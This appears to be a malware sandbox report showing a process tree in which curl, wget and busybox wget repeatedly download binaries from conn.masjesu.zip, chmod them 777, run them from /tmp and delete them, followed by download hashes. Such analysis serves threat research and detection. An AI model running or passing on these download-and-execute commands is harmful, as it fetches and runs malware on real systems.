/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- System Network Configuration Discovery
PID:967
-
-
/bin/chmodchmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:975
-
-
/bin/chmodchmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:982
-
-
/bin/chmodchmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:1010
-
-
/bin/chmodchmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:1017
-
-
/bin/chmodchmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97